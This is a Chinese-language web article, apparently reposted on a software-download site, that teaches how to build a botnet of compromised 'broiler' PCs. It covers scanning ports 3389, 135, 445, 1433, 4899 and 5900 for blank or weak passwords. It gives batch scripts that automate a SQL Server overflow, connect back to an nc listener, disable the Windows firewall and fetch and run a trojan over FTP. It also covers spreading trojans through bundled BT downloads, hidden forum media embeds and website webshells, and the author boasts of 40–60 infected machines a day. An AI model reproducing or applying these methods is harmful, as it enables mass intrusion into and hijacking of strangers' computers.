各端口抓肉鸡的几种方法pc软件 文章资讯 手机软件

您当前的位置→图文中心安全防范各端口抓肉鸡的几种方法

各端口抓肉鸡的几种方法


2009/3/3  编辑:佚名 来源:本站整理  关键词:

各端口抓肉鸡的几种方法

 

编辑:这几天看到这篇文章就在各网站转载, 居然大多是不完全的


扫3389端口抓肉鸡(适合新手)(抓不了国外肉鸡)
现就在我们国家内网络net上流传着一种克隆版的XP, 安装后会默认启动一个账号为new,密码为空的账户, 而且可以说是上都是开着3389的, 我们我自己就可以能够利用这一点来抓肉鸡。 最先是用端口扫描必备工具(如S扫)扫一段IP的3389端口, 扫完后就直接用远程桌面连载开放3389的机器(也可以能够把结果保存为文本文件程序, 用批量生成3389连载的必备工具来连载), 之后输入账号new登入, 如果别人的电脑前没人的话您就可以能够去您的空间下载您传好的木马安装拉~~这种方法只针XP系统system, 如果遇到2000或者2003系统system就一定不要试了呵呵。 缺点也很明显, 如果别人不是用new账号登入XP的, 您再登入上去就一定会把他挤出去(XP只支持单用户登入, 用户登入有请求需要用必备工具开), 或者电脑前有人您就不有可能去打开IE下载木马了。
2、扫135端口抓肉鸡
最先是先用端口扫描器扫一段IP的135端口, 之后把结果保存, 再用NTSCAN过滤有弱口令的机器, 最后用recton开telnet传马。 因为现就在135和445端口都被防火墙屏蔽了, 只能扫本地的135肉鸡, 要抓外地的只能用外地的135肉鸡来扫。 (详细动画可以能够去黑客网站搜索135)
3、扫445端口抓肉鸡
和扫135抓肉鸡差不多, 最先是先用端口扫描器扫一段IP的445端口, 之后把结果保存, 再用NTSCAN过滤有弱口令的机器, 最后用啊D必备工具包开共享传马。 因为现就在135和445端口都被防火墙屏蔽了, 只能扫本地的445肉鸡, 要抓外地的只能用外地的445肉鸡来扫。 (详细动画可以能够去黑客网站搜索445)
4、1433端口批量溢出抓肉鸡
这个方法可以能够实现全全自动抓鸡, 不过现就在太多人搞, 成功率已经不高了。
要用到的必备工具:S扫 sqlhello.exe nc.exe 批处理文件程序
最先是先写个批处理, 打开记事本, 把以下代码复制修改后, 储存为扫描+溢出.bat文件程序
@echo off
for /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save
@echo off
for /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556
还要新建一个tt.txt, 里面您要扫的IP段, 格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格
1433是要扫描的端口, 1000是扫描线程数 , do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添您的IP, 556是后面NC监听的端口
之后再写个批处理
@echo off
Nc -l -vv -p 556>daima.txt
echo username>>daima.txt
echo password>>daima.txt
echo bin>>daima.txt(以2进制传输数据信息)
echo get xxx.exe(您的木马的文件程序名,要放就在根目录下)>>daima.txt
echo bye>>daima.txt
net stop sharedaccess(关闭WINDOWS自带防火墙)
ftp -s:daima.txt
xxx.exe(也是填您木马的文件程序名)
del daima.txt
提醒一定要注意上面的代码回车符别删掉, 要不然就没法下您的马了。
更多的代码去本站找找
上面的步骤都搞好后, 就可以能够现在开始扫肉鸡了。
先打开多个NC.bat,之后再打开扫描+溢出.bat,之后您就可以能够去睡大觉了。 全自动扫描, 扫描完后全自动溢出, 溢出后还全自动下马执行, 爽吧!所以这里讲详细点, 呵呵。 还是有42 21端口也可以能够这样溢出, 只要用这些端口的溢出必备工具就好了, 详细动画可以能够去黑客网站搜索1433。
忘了说, 上面的必备工具和批处理什么的都要放就在同一个个文件程序夹下。
先休息一下, 打这么多字累死了
继续
5、扫1433抓肉鸡之方法2
要用到的必备工具:端口扫描器 X-scan SQL综合利用必备工具
上面我们我自己说过了, 1433溢出现就在成功率已经不高了, 所以我们我自己可以能够用另一种方法。
开了1433端口的机器一般都装了SQL, 所以我们我自己可以能够猜测SQL弱口令来抓1433肉鸡。
最先是先用端口扫描器扫一段IP的1433端口, 之后结果保存为文本文件程序, 接着用X-scan导入这些开了1433的IP, 之后就在扫描参数-全局布置设置-扫描模块这一栏里只勾上SQL-SERVER就可以能够了, 其他一定不要勾。 之后就在插件布置设置-端口相关布置设置-待检测端口这一栏, 只填1433端口。 之后就可以能够现在开始扫描了。 扫描完成后会有个报告, 列出了有弱口令的机器, 之后打开SQL综合利用必备工具, 输入您扫到的弱口令来连载, 接着打开SQL综合利用必备工具-利用目录, 上传您的木马, 之后就在用DOS命令执行您的木马就OK了。
6、用WINNTAutoAttack扫SA弱口令抓肉鸡
其实这个原理和上面一样, 效率也没上面的高, 只是想让大家知道下, 呵呵。
必备工具:WINNTAutoAttack SQL综合利用必备工具
打开WINNTAutoAttack, 找一段IP添上, 之后只勾上布置设置下的只对PING检查成功的机器来进行检测和SQL列出密码为空的SA账号, 接着现在开始扫描, 扫完后, 用 SQL综合利用必备工具连上传马执行就好了。
7、扫4899空口令抓肉鸡
必备工具:端口扫描器 4899探测器 Radmin
最先是先用端口扫描器扫一段IP的4899端口, 之后用4899探测器导入开了4899端口的IP, 接着扫空令, 最后用Radmin连载有空口令的机器, 带开文件程序管理, 上传的您木马运行就OK了。 详细动画可以能够去黑客网站搜索4899
8、扫5900端口抓VNC肉鸡
必备工具:VNC扫描器 VNC连载器
最先是用VNC扫描器扫描一段IP, 扫描格式为vscan.exe(扫描器文件程序名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv
扫描完成后会就在扫描器所就在的同一个文件程序夹生成一个文本文件程序, 打开后有一列IP, IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连载。 接着就用VNC连载器连载, 下面就不用多说了吧? 详细动画可以能够去黑客网站搜索VNC
接下来说说挂马抓肉鸡吧。 方法有很多, 比如BT挂马、免费空间挂马、迅雷挂马等等, 有些我也还将不会, 呵呵。 下面就介绍说明几种我会的。
1、BT挂马
顾名思义, 就是把您的木马发布出来到BT网站让人下载。 当然如果只把单纯的木马文件程序发布出来上去效果肯定不好, 而且现就在一般的BT网站也不让发布出来EXE文件程序。 所以我们我自己有请求需要一些隐藏的手法。 我们我自己可以能够先把木马用捆绑器和一些电影、音乐、游戏捆绑就在一起, 再压缩成RAR文件程序发布出来, 谁就在现在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完, 打开发现是EXE的格式后, 总有些菜鸟会不想辜负我自己花费的时间而忍不住打开吧?尤其是下XXX片的时候 当然您也可以能够做个网页木马, 之后把您网页木马的地址插入到您发布出来的文件程序中(不是所有文件程序都可以能够这样的, 我只知道RM和EXE文件程序可以能够插入), 别人下载打开后同一个时间也会带开您的网页木马, 如果他的系统system没有补供您网页木马所利用的漏洞的话, 那他就一定会中您的马了。 有些网友朋友有可能会想, 我把木马和其他文件程序捆绑后格式保持一直为那个文件程序(比如RM捆绑木马后保持一直RM格式), 那样别人不就将不会怀疑了吗?呵呵, 如果真有这样的好事那我上面何不说把木马和BT种子文件程序绑就在一起发布出来, 那样您肉鸡不抓疯了才怪~~所以就在这里说一下, 木马和其他文件程序捆绑后生成的文件程序只能为EXE格式的, 除非您有您所捆绑文件程序的格式的溢出漏洞, 那样才能把生成后的文件程序格式保持一直为您所捆绑文件程序的格式。 不过这样的漏洞现就在很少, 大多都被补了, 就算有别人也不一定会公开, 为什么想想就知道了吧。 就在这里就说一个最近的RAR溢出漏洞, 针对winrar3.6版本以下的所有版本, 只要您winrar版本低于3.6, 运行绑了牧马的RAR文件程序后就一定会中马。 此类木马症状为:运行RAR文件程序后会弹出一个什么什么损坏还是错误的对话框, 之后RAR文件程序体积变小, 减少的体积就为木马的体积。 之后再次打开这个RAR文件程序一切正常, 将不会弹出错误对话框。 就在这里提醒下各位赶快更新下WINRAR版本, 小心中马哈。 :lol
2、免费空间挂马
其实和BT差不多, 就是把做好的木马上传到您申请的免费空间, 之后到论坛发些诱惑性的帖子让别人下载您的木马。 优点是不用像BT那样做种子, 那样不只要开着电脑, 还反应影响网速。 我这几天就是这样挂的, 弄个免费空间, 上传个木马, 到2个XXX论坛发个帖子, 每一天睡前一顶, 才挂了几天, 现就在每一天肉鸡都保持一直就在40-60只。 而且大部分都是美国(美利坚和众国)的, 很容易吧? :lol :lol
3、用RM就在论坛挂马
最先是您弄个只有几秒钟的RM文件程序, 之后插入您的网页木马, 接着上传到您的空间, 之后到一些支持插入RM连载的论坛发帖子, 点插入real media 播放器, 输入您的RM牧马地址, 之后高度宽度都设为1(这部是为了保证隐蔽性:lol ), 之后点发贴, 这样别人就在浏览您的帖子就一定会运行您的RM木马, 而我们我自己前面把高和宽设为1, 就在帖子里RM连载就看不到了。 这样别人就不知不觉中了我们我自己的马了:lol 好像FLASH木马也可以能够这样的, 我没试过, 大家可以能够去研究下。
4、入侵网站挂马
这个我也将不会, 预先安排准备学习, 就在这里也提一下吧。 比如您要入侵一个网站, 最先是得用必备工具扫一下漏洞, 之后凭借这些漏洞上传您做好的ASP网马, 之后运行您的ASP网马, 您就可以能够对这个网站的网页来进行一系列修改, 比如就在他主页首页插入您的木马地址, 这样别人就在浏览这个网站的主页首页时就一定会中您的马了。 中间过程也挺复杂了, 我也只了解一点点, 如果说错了还请各位批评指正。

相关文章
  • 各端口抓肉鸡的几种方法
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图